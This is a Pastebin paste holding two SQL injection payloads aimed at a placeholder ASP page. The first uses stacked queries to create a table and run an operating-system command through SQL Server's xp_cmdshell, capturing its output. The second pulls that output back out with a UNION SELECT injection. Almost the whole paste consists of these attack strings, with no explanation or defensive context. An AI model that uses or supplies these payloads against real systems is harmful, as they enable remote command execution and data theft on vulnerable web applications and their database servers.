Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1) executing xp_cmdshell
- http://www.target.com/vuln.asp?param=1';IF object_id('result') IS NOT NULL DROP TABLE result; CREATE TABLE result (output varchar(200));INSERT INTO result EXEC xp_cmdshell 'dir C:'--
- 2) result retrieval through UNION injection
- http://www.target.com/vuln.asp?param=-1' UNION ALL SELECT NULL, NULL, output FROM result--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement